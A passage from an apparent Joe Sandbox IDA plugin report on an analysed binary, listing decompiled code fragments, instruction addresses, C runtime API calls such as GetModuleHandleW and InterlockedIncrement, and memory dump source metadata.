				 *(_t40 - 4) = 0xfffffffe;
				return E00F65955(E00F646C1());
			}







    0x00f64616
    0x00f64616
    0x00f64618
    0x00f6461d
    0x00f64627
    0x00f6462d
    0x00f64630
    0x00f64637
    0x00f6463e
    0x00f64641
    0x00f64644
    0x00f6464b
    0x00f64652
    0x00f6465b
    0x00f64661
    0x00f64668
    0x00f6466e
    0x00f64675
    0x00f6467c
    0x00f64682
    0x00f64685
    0x00f64688
    0x00f6468d
    0x00f6468f
    0x00f64694
    0x00f64694
    0x00f6469a
    0x00f646a0
    0x00f646b1

    APIs
    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00F69E48,00000008,00F6471E,00000000,00000000,?,?,00F6474B,?,00F63785), ref: 00F64627
      • Part of subcall function 00F66117: __amsg_exit.LIBCMT ref: 00F66139
      • Part of subcall function 00F66117: EnterCriticalSection.KERNEL32(?,?,?,00F64660,0000000D), ref: 00F66141
    • InterlockedIncrement.KERNEL32(00F6B008), ref: 00F64668
      • Part of subcall function 00F6425A: InterlockedIncrement.KERNEL32(00000000,00000001,?,?,?,00F6469F,?), ref: 00F6426C
      • Part of subcall function 00F6425A: InterlockedIncrement.KERNEL32(?,?,?,00F6469F,?), ref: 00F64279
      • Part of subcall function 00F6425A: InterlockedIncrement.KERNEL32(?,?,?,00F6469F,?), ref: 00F64286
      • Part of subcall function 00F6425A: InterlockedIncrement.KERNEL32(?,?,?,00F6469F,?), ref: 00F64293
      • Part of subcall function 00F6425A: InterlockedIncrement.KERNEL32(?,?,?,00F6469F,?), ref: 00F642A0
      • Part of subcall function 00F6425A: InterlockedIncrement.KERNEL32(?,?,?,00F6469F,?), ref: 00F642BC
      • Part of subcall function 00F6425A: InterlockedIncrement.KERNEL32(?,?,?,00F6469F,?), ref: 00F642CC
      • Part of subcall function 00F6425A: InterlockedIncrement.KERNEL32(?,?,?,00F6469F,?), ref: 00F642E2
    Strings
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd